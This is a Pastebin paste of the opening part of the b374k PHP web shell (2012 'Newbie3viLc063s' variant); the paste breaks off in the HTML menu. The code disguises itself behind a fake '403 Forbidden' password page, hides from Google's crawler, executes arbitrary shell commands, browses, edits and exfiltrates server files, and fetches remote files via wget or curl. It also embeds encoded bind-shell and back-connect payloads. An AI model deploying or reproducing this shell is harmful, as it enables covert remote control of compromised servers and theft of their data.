Pcyber

Shell B374K Newbie3viLc063s 2012 R2

Apr 10th, 2012
2,530
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 109.95 KB | None | 0 0
  1. <?php
  2. /*********************************************************************************************************/
  3. $auth_pass = ""; //password crypted with md5, default is 'Newbie3viLc063s'
  4. /*********************************************************************************************************/
  5. $color = "#00ff00";
  6. $default_action = 'FilesMan';
  7. @define('SELF_PATH', __FILE__);
  8.  
  9. /*********************************************************************************************************/
  10. # Avoid google's crawler
  11. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  12. /*********************************************************************************************************/
  13.  
  14. @session_start();
  15. @error_reporting(0);
  16. @ini_set('error_log',NULL);
  17. @ini_set('log_errors',0);
  18. @ini_set('max_execution_time',0);
  19. @set_time_limit(0);
  20. @set_magic_quotes_runtime(0);
  21. @define('VERSION', 'v.2012');
  22. @define('TITLE', ':: b374k Newbie3viLc063s 2012 ::');
  23.  
  24. /*********************************************************************************************************/
  25.  
  26. if( get_magic_quotes_gpc() )
  27. {
  28. function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
  29. $_POST = stripslashes_array($_POST);
  30. }
  31.  
  32. function logout()
  33. {
  34. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  35. $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
  36. echo '<center><span class="b1">The System Is Going To Down For LogOut Administrator Pages!!</scan></center>';
  37. ?>
  38. <script>window.location.href = '<?php print $page; ?>';</script>
  39. <?php
  40. exit(0);
  41. }
  42.  
  43. $disablefunc = @ini_get("disable_functions");
  44.  
  45. function showdisablefunctions() {
  46. if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#00FF1E'>".$disablefunc."</span>"; }
  47. else { return "<span style='color:#00FF1E'>NONE</span>"; }
  48. }
  49.  
  50. function ex($cfe) {
  51. $res = '';
  52. if (!empty($cfe)) {
  53. if(function_exists('exec')) {
  54. @exec($cfe,$res);
  55. $res = join("\n",$res);
  56. } elseif(function_exists('shell_exec')) {
  57. $res = @shell_exec($cfe);
  58. } elseif(function_exists('system')) {
  59. @ob_start();
  60. @system($cfe);
  61. $res = @ob_get_contents();
  62. @ob_end_clean();
  63. } elseif(function_exists('passthru')) {
  64. @ob_start();
  65. @passthru($cfe);
  66. $res = @ob_get_contents();
  67. @ob_end_clean();
  68. } elseif(@is_resource($f = @popen($cfe,"r"))) {
  69. $res = "";
  70. while(!@feof($f)) { $res .= @fread($f,1024); }
  71. @pclose($f);
  72. } else { $res = "Ex() Disabled!"; }
  73. }
  74. return $res;
  75. }
  76.  
  77.  
  78. function showstat($stat) {
  79. if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
  80. else { return "<font color=red><b>OFF</b></font>"; }
  81. }
  82. function testperl() {
  83. if (ex('perl -h')) { return showstat("on"); }
  84. else { return showstat("off"); }
  85. }
  86. function testfetch() {
  87. if(ex('fetch --help')) { return showstat("on"); }
  88. else { return showstat("off"); }
  89. }
  90. function testwget() {
  91. if (ex('wget --help')) { return showstat("on"); }
  92. else { return showstat("off"); }
  93. }
  94. function testoracle() {
  95. if (function_exists('ocilogon')) { return showstat("on"); }
  96. else { return showstat("off"); }
  97. }
  98. function testpostgresql() {
  99. if (function_exists('pg_connect')) { return showstat("on"); }
  100. else { return showstat("off"); }
  101. }
  102. function testmssql() {
  103. if (function_exists('mssql_connect')) { return showstat("on"); }
  104. else { return showstat("off"); }
  105. }
  106. function testcurl() {
  107. if (function_exists('curl_version')) { return showstat("on"); }
  108. else { return showstat("off"); }
  109. }
  110. function testmysql() {
  111. if (function_exists('mysql_connect')) { return showstat("on"); }
  112. else { return showstat("off"); }
  113. }
  114.  
  115. $quotes = get_magic_quotes_gpc();
  116. if ($quotes == "1" or $quotes == "on")
  117. {
  118. $quot = "<font color='red'>ON</font>";
  119. }
  120. else
  121. {
  122. $quot = "<font color='green'>OFF</font>";
  123. }
  124.  
  125. function printLogin()
  126. {
  127. ?>
  128. <html>
  129. <head>
  130. <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>
  131. </head>
  132. <title>
  133. 403 Forbidden
  134. </title>
  135. <body>
  136. <h1>Forbidden</h1>
  137. <p>You don't have permission to access this file on this server <?=$_SERVER['HTTP_HOST']?>.</p>
  138. <hr>
  139. <form method=post>
  140. <address>Apache/2.2.8 at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit value=''></center></address>
  141. </form>
  142. </body>
  143. </html>
  144. <?php
  145. exit;
  146. }
  147.  
  148. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  149. {
  150. if( empty( $auth_pass ) || ( isset( $_POST['x'] ) && ( md5($_POST['x']) == $auth_pass ) ) )
  151. { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }
  152. else
  153. { printLogin(); }
  154. }
  155.  
  156. if(isset($_GET['dl']) && ($_GET['dl'] != ""))
  157. {
  158. $file = $_GET['dl'];
  159. $filez = @file_get_contents($file);
  160. header("Content-type: application/octet-stream");
  161. header("Content-length: ".strlen($filez));
  162. header("Content-disposition: attachment;
  163. filename=\"".basename($file)."\";");
  164. echo $filez;
  165. exit;
  166. }
  167.  
  168. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
  169. {
  170. $file = $_GET['dlgzip'];
  171. $filez = gzencode(@file_get_contents($file));
  172. header("Content-Type:application/x-gzip\n");
  173. header("Content-length: ".strlen($filez));
  174. header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  175. echo $filez; exit;
  176. }
  177.  
  178. if(isset($_GET['img']))
  179. {
  180. @ob_clean();
  181. $d = magicboom($_GET['y']);
  182. $f = $_GET['img'];
  183. $inf = @getimagesize($d.$f);
  184. $ext = explode($f,".");
  185. $ext = $ext[count($ext)-1];
  186. @header("Content-type: ".$inf["mime"]);
  187. @header("Cache-control: public");
  188. @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  189. @header("Cache-control: max-age=".(60*60*24*7));
  190. @readfile($d.$f);
  191. exit;
  192. }
  193. $ver = VERSION;
  194.  
  195. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  196.  
  197. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
  198. else $safemode = FALSE;
  199. $system = @php_uname();
  200.  
  201. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  202. else $win = FALSE;
  203.  
  204. if(isset($_GET['y']))
  205. { if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }
  206.  
  207. if(!$win)
  208. { if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
  209. else
  210. {
  211. $user = @get_current_user();
  212. $id = $user;
  213. $prompt = $user." &gt;";
  214. $pwd = realpath(".")."\\";
  215. $v = explode("\\",$d);
  216. $v = $v[0];
  217. foreach (range("A","Z") as $letter)
  218. {
  219. $bool = @is_dir($letter.":\\");
  220. if ($bool)
  221. {
  222. $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  223. if ($letter.":" != $v) {$letters .= $letter;}
  224. else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  225. $letters .= " ]</a> ";
  226. }
  227. }
  228. }
  229.  
  230. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  231. else $posix = FALSE;
  232.  
  233. $bytes = disk_free_space(".");
  234. $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  235. $base = 1024;
  236. $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
  237. $totalspace_bytes = disk_total_space(".");
  238. $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  239. $totalspace_bases = 1024;
  240. $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
  241. $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
  242. $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
  243. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  244. $my_ip = $_SERVER['REMOTE_ADDR'];
  245. $bindport = "55555";
  246. $bindport_pass = "Newbie3viLc063s";
  247. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  248. $pwdurl = "";
  249. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
  250. {
  251. $pathz = "";
  252. for($j = 0 ; $j <= $i ; $j++)
  253. {
  254. $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  255. }
  256. $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  257. }
  258.  
  259. if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; }
  260. $buff = $DISP_SERVER_SOFTWARE."<br />";
  261. $buff .= $system."<br />";
  262. if($id != "") $buff .= $id."<br />";
  263. $buff .= "Server IP : "."<span style='color:#FF8800'>$server_ip</span>"."<font> | </font>"."Your IP : "."<span style='color:#FF0000'>$my_ip</span>"."<br />";
  264. $buff .= "Total HDD Space : "."<span style='color:#00FF1E'>$totalspace_show</span>"."<font> | </font>"."Free HDD Space : "."<span style='color:#00FF1E'>$freespace_show</span>"."<br />";
  265. $buff .= "Magic Quotes:$quot"."<br>";
  266. $buff .= "Disabled Functions: ".showdisablefunctions()."<br>";
  267. $buff .= "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql()." cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
  268. if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
  269. else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
  270. $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
  271.  
  272. function rapih($text){ return trim(str_replace("<br />","",$text)); }
  273.  
  274. function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
  275.  
  276. function showdir($pwd,$prompt)
  277. {
  278. $fname = array();
  279. $dname = array();
  280. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  281. else $posix = FALSE;
  282. $user = "????:????";
  283. if($dh = opendir($pwd))
  284. {
  285. while($file = readdir($dh))
  286. {
  287. if(is_dir($file))
  288. { $dname[] = $file; }
  289. elseif(is_file($file))
  290. { $fname[] = $file; }
  291. }
  292. closedir($dh);
  293. }
  294. sort($fname);
  295. sort($dname);
  296. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  297. $tree = @sizeof($path);
  298. $parent = "";
  299. $buff = "<form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  300. <table class=\"cmdbox\" style=\"width:50%;\">
  301. <tr>
  302. <td>CMD@$prompt</td>
  303. <td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
  304. <input class=\"inputzbut\" type=\"submit\" value=\"Execute !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  305. </tr>
  306. </form>
  307. <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  308. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  309. <tr>
  310. <td>view file/folder</td>
  311. <td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
  312. <input class=\"inputzbut\" type=\"submit\" value=\"Enter !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  313. </tr>
  314. </form>
  315. </table>
  316. <table class=\"explore\">
  317. <tr>
  318. <th>name</th>
  319. <th style=\"width:80px;\">size</th>
  320. <th style=\"width:210px;\">owner:group</th>
  321. <th style=\"width:80px;\">perms</th>
  322. <th style=\"width:110px;\">modified</th>
  323. <th style=\"width:190px;\">actions</th>
  324. </tr> ";
  325.  
  326. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  327. else $parent = $pwd;
  328. foreach($dname as $folder)
  329. {
  330. if($folder == ".")
  331. {
  332. if(!$win && $posix)
  333. {
  334. $name=@posix_getpwuid(@fileowner($folder));
  335. $group=@posix_getgrgid(@filegroup($folder));
  336. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  337. }
  338. else { $owner = $user; }
  339. $buff .= "<tr>
  340. <td><a href=\"?y=".$pwd."\">$folder</a></td>
  341. <td>-</td>
  342. <td style=\"text-align:center;\">".$owner."</td>
  343. <td>".get_perms($pwd)."</td>
  344. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td>
  345. <td><span id=\"titik1\">
  346. <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
  347. | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  348. </span>
  349. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  350. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  351. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  352. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  353. </form>
  354. </td>
  355. </tr> ";
  356. }
  357. elseif($folder == "..")
  358. {
  359. if(!$win && $posix)
  360. {
  361. $name=@posix_getpwuid(@fileowner($folder));
  362. $group=@posix_getgrgid(@filegroup($folder));
  363. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  364. }
  365. else { $owner = $user; }
  366. $buff .= "<tr>
  367. <td><a href=\"?y=".$parent."\">$folder</a></td>
  368. <td>-</td>
  369. <td style=\"text-align:center;\">".$owner."</td>
  370. <td>".get_perms($parent)."</td>
  371. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  372. <td><span id=\"titik2\">
  373. <a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
  374. | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
  375. </span>
  376. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  377. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  378. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  379. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  380. </form>
  381. </td>
  382. </tr>";
  383. }
  384. else
  385. {
  386. if(!$win && $posix)
  387. {
  388. $name=@posix_getpwuid(@fileowner($folder));
  389. $group=@posix_getgrgid(@filegroup($folder));
  390. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  391. }
  392. else { $owner = $user; }
  393. $buff .= "<tr>
  394. <td>
  395. <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
  396. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  397. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  398. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  399. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  400. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  401. onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  402. </form>
  403. </td>
  404. <td>DIR</td>
  405. <td style=\"text-align:center;\">".$owner."</td>
  406. <td>".get_perms($pwd.$folder)."</td>
  407. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
  408. <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
  409. | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
  410. </td>
  411. </tr>";
  412. }
  413. }
  414. foreach($fname as $file)
  415. {
  416. $full = $pwd.$file;
  417. if(!$win && $posix)
  418. {
  419. $name=@posix_getpwuid(@fileowner($file));
  420. $group=@posix_getgrgid(@filegroup($file));
  421. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  422. }
  423. else { $owner = $user; }
  424. $buff .= "<tr>
  425. <td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a>
  426. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  427. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  428. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  429. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  430. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  431. onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  432. </form> </td>
  433. <td>".ukuran($full)."</td>
  434. <td style=\"text-align:center;\">".$owner."</td>
  435. <td>".get_perms($full)."</td>
  436. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  437. <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a>
  438. | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
  439. | <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
  440. | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
  441. </td>
  442. </tr>";
  443. }
  444. $buff .= "</table>"; return $buff;
  445. }
  446.  
  447. function ukuran($file)
  448. {
  449. if($size = @filesize($file))
  450. {
  451. if($size <= 1024) return $size;
  452. else
  453. {
  454. if($size <= 1024*1024)
  455. { $size = @round($size / 1024,2);; return "$size kb"; }
  456. else { $size = @round($size / 1024 / 1024,2); return "$size mb"; }
  457. }
  458. }
  459. else return "???";
  460. }
  461.  
  462. function exe($cmd)
  463. {
  464. if(function_exists('system'))
  465. {
  466. @ob_start();
  467. @system($cmd);
  468. $buff = @ob_get_contents();
  469. @ob_end_clean();
  470. return $buff;
  471. }
  472. elseif(function_exists('exec'))
  473. {
  474. @exec($cmd,$results);
  475. $buff = "";
  476. foreach($results as $result)
  477. { $buff .= $result; }
  478. return $buff;
  479. }
  480. elseif(function_exists('passthru'))
  481. {
  482. @ob_start();
  483. @passthru($cmd);
  484. $buff = @ob_get_contents();
  485. @ob_end_clean();
  486. return $buff;
  487. }
  488. elseif(function_exists('shell_exec'))
  489. {
  490. $buff = @shell_exec($cmd);
  491. return $buff;
  492. }
  493. }
  494.  
  495. function tulis($file,$text)
  496. {
  497. $textz = gzinflate(base64_decode($text));
  498. if($filez = @fopen($file,"w"))
  499. {
  500. @fputs($filez,$textz);
  501. @fclose($file);
  502. }
  503. }
  504.  
  505. function ambil($link,$file)
  506. {
  507. if($fp = @fopen($link,"r"))
  508. {
  509. while(!feof($fp))
  510. {
  511. $cont.= @fread($fp,1024);
  512. }
  513. @fclose($fp);
  514. $fp2 = @fopen($file,"w");
  515. @fwrite($fp2,$cont);
  516. @fclose($fp2);
  517. }
  518. }
  519.  
  520. function which($pr)
  521. {
  522. $path = exe("which $pr");
  523. if(!empty($path))
  524. { return trim($path); }
  525. else { return trim($pr); }
  526. }
  527.  
  528. function download($cmd,$url)
  529. {
  530. $namafile = basename($url);
  531. switch($cmd)
  532. {
  533. case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break;
  534. case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break;
  535. case 'wfread' : ambil($wurl,$namafile);break;
  536. case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  537. case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  538. case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  539. case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  540. default: break; }
  541. return $namafile;
  542. }
  543.  
  544. function get_perms($file)
  545. {
  546. if($mode=@fileperms($file))
  547. {
  548. $perms='';
  549. $perms .= ($mode & 00400) ? 'r' : '-';
  550. $perms .= ($mode & 00200) ? 'w' : '-';
  551. $perms .= ($mode & 00100) ? 'x' : '-';
  552. $perms .= ($mode & 00040) ? 'r' : '-';
  553. $perms .= ($mode & 00020) ? 'w' : '-';
  554. $perms .= ($mode & 00010) ? 'x' : '-';
  555. $perms .= ($mode & 00004) ? 'r' : '-';
  556. $perms .= ($mode & 00002) ? 'w' : '-';
  557. $perms .= ($mode & 00001) ? 'x' : '-';
  558. return $perms;
  559. }
  560. else return "??????????";
  561. }
  562.  
  563. function clearspace($text){ return str_replace(" ","_",$text); }
  564.  
  565. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  566. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  567.  
  568. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  569. ?>
  570.  
  571. <html>
  572. <head>
  573. <link rel="shortcut icon" href="http://www.cpm-hosting.com/favicon.ico" type="image/x-icon" />
  574. <title><?php print TITLE; ?> <?php echo VERSION; ?></title>
  575. <script type="text/javascript">
  576.  
  577. function tukar(lama,baru)
  578. {
  579. document.getElementById(lama).style.display = 'none';
  580. document.getElementById(baru).style.display = 'block';
  581. }
  582.  
  583. </script>
  584. <style type="text/css">
  585. AKUSTYLE { display:none; }
  586. body { background:#0F0E0E; }
  587. A:link {COLOR: #2BA8EC; TEXT-DECORATION: none }
  588. A:visited {COLOR: #2BA8EC; TEXT-DECORATION: none }
  589. A:hover {text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan; color: #ff9900; TEXT-DECORATION: none }
  590. A:active {color: Red; TEXT-DECORATION: none }
  591. textarea {BORDER-RIGHT: #3e3e3e 1px solid; BORDER-TOP: #3e3e3e 1px solid; BORDER-LEFT: #3e3e3e 1px solid; BORDER-BOTTOM: #3e3e3e 1px solid; BACKGROUND-COLOR: #1b1b1b; font: Fixedsys bold; color: #aaa; }
  592. * { font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  593. #menu { background:#111111; margin:2px 2px 2px 2px; }
  594. #menu a { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
  595. #menu a:hover { background:#744F4F; border-bottom:1px solid #333333; border-top:1px solid #333333; }
  596. .tabnet { margin:15px auto 0 auto; border: 1px solid #333333; }
  597. .main { width:100%; }
  598. .gaya { color: #4C83AF; }
  599. .your_ip { color: #FF4719; }
  600. .inputz { background:#796767; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
  601. .inputzbut { background:#111111; color:#666666; margin:0 4px; border:1px solid #444444; }
  602. .inputz:hover,
  603. .inputzbut:hover { border-bottom:1px solid #4532F6; border-top:1px solid #D4CECE; color:#D4CECE; }
  604. .output { margin:auto; border:1px solid #FF0000; width:100%; height:400px; background:#000000; padding:0 2px; }
  605. .cmdbox { width:100%; }
  606. .head_info { padding: 0 4px; }
  607. .b1 { font-size:30px; padding:0; color:#FF0000; }
  608. .b2 { font-size:30px; padding:0; color: #FF9966; }
  609. .b_tbl { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
  610. .phpinfo table { width:100%; padding:0 0 0 0; }
  611. .phpinfo td { background:#111111; color:#cccccc; padding:6px 8px;; }
  612. .phpinfo th, th { background:#191919; border-bottom:1px solid #333333; font-weight:normal; }
  613. .phpinfo h2,
  614. .phpinfo h2 a { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  615. .explore { width:100%; }
  616. .explore a { text-decoration:none; }
  617. .explore td { border-bottom:1px solid #DB2B2B; padding:0 8px; line-height:24px; }
  618. .explore th { padding:3px 8px; font-weight:normal; }
  619. .explore th:hover,
  620. .phpinfo th:hover { border-bottom:1px solid #4C83AF; }
  621. .explore tr:hover { background:#744F4F; }
  622. .viewfile { background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
  623. .sembunyi { display:none; padding:0;margin:0; }
  624. </style>
  625. </head>
  626. <body onLoad="document.getElementById('cmd').focus();">
  627. <div class="main">
  628. <!-- head info start here -->
  629. <div class="head_info">
  630. <table>
  631. <tr>
  632. <td>
  633. <table class="b_tbl">
  634. <tr>
  635. <td>
  636. <a href="?">
  637. <span class="b1">b<span class="b2">3<span class="b1">7</span>4</span>k</span>
  638. </a>
  639. </td>
  640. </tr>
  641. <tr>
  642. <td>m1n1 Newbie3viLc063s <?php echo $ver; ?></td>
  643. </tr>
  644. </table>
  645. </td>
  646. <td>
  647. <?php echo $buff; ?>
  648. </td>
  649. </tr>
  650. </table>
  651. </div>
  652. <!-- head info end here -->
  653. <!-- menu start -->
  654. <div id="menu">
  655. <center>
  656. <a href="?<?php echo "y=".$pwd; ?>"> <b>Explore</b></a>
